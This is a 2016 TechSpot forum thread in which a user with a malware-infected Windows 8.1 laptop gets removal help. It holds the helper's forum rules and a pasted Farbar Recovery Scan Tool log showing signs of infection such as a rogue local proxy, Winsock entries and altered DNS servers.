TechSpot

Virus won't let my laptop connect to internet

By hersheychoco
Jan 5, 2016
  1. I've already tried the proxy setting and I've already tried to reset my host file. I scanned my computer at first and ASC was able to stop the virus from blocking my firewall settings so I was able to change them but I still cannot connect to the internet. Please someone help, I need this laptop for school :(
     
  2. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    Welcome aboard

    Please complete all steps listed here: http://www.techspot.com/vb/topic58138.html
    Make sure you PASTE all logs. If a log exceeds the 50,000-character post limit, split it between a couple of replies.
    Attached logs won't be reviewed.

    Please observe the following rules:
    • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
    • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer's behavior, good or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
     
  3. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    FRST.txt
    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:31-12-2015
    Ran by hersheychoco9 (administrator) on CHOCOYAUTJA (05-01-2016 17:08:26)
    Running from D:\Utilities
    Loaded Profiles: hersheychoco9 (Available Profiles: hersheychoco9 & Administrator)
    Platform: Windows 8.1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: IE)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
    (Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
    (Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (IObit) C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
    (Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
    (Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSRTSrv.rse
    (Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSUpdSrv.rse
    (Paltiosoft Inc.) C:\Program Files (x86)\SoftDenchi\UCManSvc.exe
    (Wondershare) C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
    (Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
    (Microsoft Corporation) C:\WINDOWS\System32\SkyDrive.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
    (Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
    (Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
    (Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    (Microsoft Corporation) C:\WINDOWS\System32\InputMethod\JPN\JpnIME.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
    (Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
    (Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxtray.exe
    (Intel Corporation) C:\WINDOWS\System32\hkcmd.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxsrvc.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxpers.exe
    (Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSAgent.rse
    (Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
    (Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
    (Wondershare) C:\Program Files (x86)\Wondershare\MobileGo\MobileGoService.exe
    (Roboscan Inc) C:\Program Files\Roboscan\Roboscan\Roboscan.rse
    (Microsoft Corporation) C:\WINDOWS\System32\SettingSyncHost.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
    (IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
    () C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
    (Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
    (Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
    (SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    (SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe
    (SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
    (Microsoft Corporation) C:\WINDOWS\SysWOW64\wbem\WmiPrvSE.exe
    () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe
    (Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSShell.rse

    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7506648 2013-12-27] (Realtek Semiconductor)
    HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1374424 2014-01-09] (Realtek Semiconductor)
    HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [5789512 2014-01-15] (Dell Inc.)
    HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
    HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation)
    HKLM\...\Run: [Roboscan] => c:\program files\roboscan\roboscan\RSLaunch.exe [257856 2013-11-18] (Roboscan Inc)
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508104 2015-09-04] (Adobe Systems Incorporated)
    Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [ezvtum] => rundll32.exe "C:\Users\hersheychoco9\AppData\Local\ezvtum.dll",ezvtum <===== ATTENTION
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [CCleaner Monitoring] => C:\Users\hersheychoco9\Desktop\Utilities\CCleaner\CCleaner64.exe [8418584 2015-07-17] (Piriform Ltd)
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {4d6de65c-5455-11e4-825b-a0886955d281} - "D:\VZW_Software_upgrade_assistant.exe"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {65359199-e247-11e4-828b-a0886955d281} - "D:\HTC_Sync_Manager_PC.exe"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [788480 2014-10-28] (Microsoft Corporation)
    HKU\S-1-5-18\...\Run: [] => 0
    HKU\S-1-5-18\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
    ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
    ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
    ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
    ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MobileGo Service.lnk [2015-10-29]
    ShortcutTarget: MobileGo Service.lnk -> C:\Program Files (x86)\Wondershare\MobileGo\MobileGoService.exe (Wondershare)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Roboscan Internet Security [2014-10-10] ()
    Startup: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk [2015-05-14]
    ShortcutTarget: Curse.lnk -> C:\Users\hersheychoco9\AppData\Roaming\Curse Client\Bin\Curse.exe (Curse, Inc)
    BootExecute: autocheck autochk * bootroboscan.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    ProxyServer: [S-1-5-21-1030869394-3123877279-975090705-1001] => http=127.0.0.1:8800
    Winsock: Catalog9 01 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 02 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 03 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 04 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 16 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9-x64 01 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
    Winsock: Catalog9-x64 02 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
    Winsock: Catalog9-x64 03 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
    Winsock: Catalog9-x64 04 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
    Winsock: Catalog9-x64 16 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 208.87.151.17,208.87.151.16
    Tcpip\..\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D}: [NameServer] 208.87.151.17,208.87.151.16
    Tcpip\..\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78}: [NameServer] 208.87.151.17,208.87.151.16
    Tcpip\..\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72}: [NameServer] 208.87.151.17,208.87.151.16
    Tcpip\..\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72}: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734}: [NameServer] 208.87.151.17,208.87.151.16
    Tcpip\..\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734}: [DhcpNameServer] 75.75.76.76 75.75.75.75

    Internet Explorer:
    ==================
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 -> DefaultScope {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
    SearchScopes: HKU\S-1-5-21-1030869394-3123877279-975090705-1001 -> {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
    BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll [2015-09-21] (IObit)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll [2015-10-06] (Oracle Corporation)
    Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)

    FireFox:
    ========
    FF ProfilePath: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default
    FF Homepage: user_pref("browser.startup.homepage","hxxp://www.only-search.com/?babsrc=HP_kms&affID=970000014");
    FF SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)");: user_pref("browser.search.selectedEngine","Search The Web (Only-Search)");
    FF DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)");: user_pref("browser.search.defaultenginename","Search The Web (Only-Search)");
    FF Keyword.URL: user_pref("keyword.URL","hxxp://www.only-search.com/?babsrc=KW_kms&affID=$afltId$&q=");
    FF NewTab: user_pref("browser.newtab.url","hxxp://www.only-search.com/?babsrc=NT_kms&affID=970000014");
    FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2015-09-17] (Adobe Systems)
    FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-18] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-18] (Intel Corporation)
    FF Plugin-x32: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-10-06] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-10-06] (Oracle Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2015-09-17] (Adobe Systems)
    FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
    FF user.js: detected! => C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\user.js [2015-12-29]
    FF SearchPlugin: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml [2015-12-28]
    FF HKLM\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
    FF HKLM-x32\...\Firefox\Extensions: [jid1-xNAj4KGyf5wyhg@jetpack] - C:\Program Files (x86)\Faster Web\faster-web.xpi => not found
    FF HKLM-x32\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found

    Chrome:
    =======
    CHR Profile: C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Docs) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-28]
    CHR Extension: (Google Drive) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-28]
    CHR Extension: (YouTube) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-28]
    CHR Extension: (Google Search) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-28]
    CHR Extension: (Gmail) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-28]
    CHR Extension: (Pool Component) - C:\Users\hersheychoco9\AppData\Local\Pool Component\Component [2016-01-05]
    CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeActiveFileMonitor11.0; C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-23] (Adobe Systems Incorporated)
    R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [669872 2015-09-15] (Adobe Systems Incorporated)
    S2 AdvancedSystemCareService8; D:\Utilities\Advanced SystemCare 8\ASCService.exe [814880 2015-04-03] (IObit)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2016448 2015-11-25] (Adobe Systems, Incorporated)
    R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
    R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
    S3 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [139328 2014-02-19] (Aviata, Inc.)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
    S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-18] (Intel Corporation)
    R2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2909472 2015-07-29] (IObit)
    S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2013-10-11] ()
    R2 Roboscan_RTSrv; C:\Program Files\Roboscan\Roboscan\RSRTSrv.rse [439104 2013-11-18] (Roboscan Inc)
    R2 Roboscan_UpdSrv; C:\Program Files\Roboscan\Roboscan\RSUpdSrv.rse [842048 2013-11-18] (Roboscan Inc)
    R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
    R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [1924328 2014-09-18] (SoftThinks SAS)
    R2 UCManSvc; C:\Program Files (x86)\SoftDenchi\UCManSvc.exe [241808 2010-03-12] (Paltiosoft Inc.) [File not signed]
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
    R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe [356352 2015-09-23] (Wondershare) [File not signed]
    R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [656664 2014-08-19] (Wacom Technology, Corp.)
    R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3671792 2013-10-11] (Intel® Corporation)
    S2 NetprotAdp; no ImagePath
    S2 SushiLeadsUpdaterService; no ImagePath
    S2 Update Simple for You; no ImagePath
    S2 WajaNetEn Monitor; no ImagePath
    S3 WsDrvInst; no ImagePath
     
  4. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [131328 2014-10-08] (Microsoft Corporation)
    R3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [32768 2014-10-08] (Microsoft Corporation)
    R3 btmaux; C:\Windows\system32\DRIVERS\btmaux.sys [140600 2013-07-22] (Motorola Solutions, Inc.)
    R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1408824 2013-10-18] (Motorola Solutions, Inc.)
    S3 DDDriver; C:\Windows\system32\drivers\DDDriver64Dcsa.sys [23760 2015-01-30] (Dell Computer Corporation)
    S3 DellProf; C:\Windows\system32\drivers\DellProf.sys [23312 2015-01-30] (Dell Computer Corporation)
    R3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2013-01-24] (OSR Open Systems Resources, Inc.)
    S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
    R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [142280 2013-10-19] (Intel Corporation)
    S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2015-12-29] (Malwarebytes)
    R3 MEIx64; C:\Windows\System32\drivers\TeeDriverx64.sys [100824 2013-12-18] (Intel Corporation)
    R3 NETwNb64; C:\Windows\system32\DRIVERS\NETwbw02.sys [3607520 2013-10-14] (Intel Corporation)
    R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
    R3 RoboFww; c:\program files\roboscan\roboscan\plugin\realtime\RoboFww.sys [35616 2013-11-18] (Roboscan Inc)
    R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [41200 2014-01-16] (Synaptics Incorporated)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
    S3 WinRing0_1_2_0; C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [14544 2010-11-01] (OpenLibSys.org)
    S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]
    S1 cherimoya; system32\drivers\cherimoya.sys [X]
    S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
    S3 iscFlash; \??\C:\Users\HERSHE~1\AppData\Local\Temp\7zS2B1B.tmp\iscflashx64.sys [X]
    S3 PCDSRVC{3B54B31B-D06B6431-06020200}_0; \??\c:\program files\dell\supportassist\pcdsrvc_x64.pkms [X]
    S3 X6va029; \??\C:\Windows\SysWOW64\Drivers\X6va029 [X]
    S1 {b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64; system32\drivers\{b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-05 17:08 - 2016-01-05 17:08 - 00000000 ____D C:\FRST
    2015-12-29 16:23 - 2015-12-29 16:23 - 00806882 _____ C:\Users\hersheychoco9\Desktop\UsbFix_Report.txt
    2015-12-29 16:11 - 2015-12-29 16:11 - 00002860 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
    2015-12-29 16:06 - 2015-12-29 16:06 - 18823680 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
    2015-12-29 16:06 - 2015-12-29 16:06 - 15159296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
    2015-12-29 16:06 - 2015-12-29 16:06 - 02476376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
    2015-12-29 16:06 - 2015-12-29 16:06 - 00428888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
    2015-12-29 16:05 - 2015-12-29 16:24 - 00000000 ____D C:\Users\hersheychoco9\Desktop\Utilities
    2015-12-29 16:05 - 2015-12-29 16:05 - 01113944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
    2015-12-29 16:05 - 2015-12-29 16:05 - 00487256 _____ (Microsoft Corporation) C:\Windows\system32\netcfgx.dll
    2015-12-29 16:05 - 2015-12-29 16:05 - 00393560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcfgx.dll
    2015-12-29 16:04 - 2015-12-29 16:04 - 06521800 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
    2015-12-29 16:04 - 2015-12-29 16:04 - 01488000 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
    2015-12-29 16:04 - 2015-12-29 16:04 - 01201664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys
    2015-12-29 16:04 - 2015-12-29 16:04 - 00261376 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll
    2015-12-29 16:04 - 2015-12-29 16:04 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BTHUSB.SYS
    2015-12-29 16:04 - 2015-12-29 16:04 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthenum.sys
    2015-12-29 16:02 - 2015-12-29 16:02 - 02819584 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers.dll
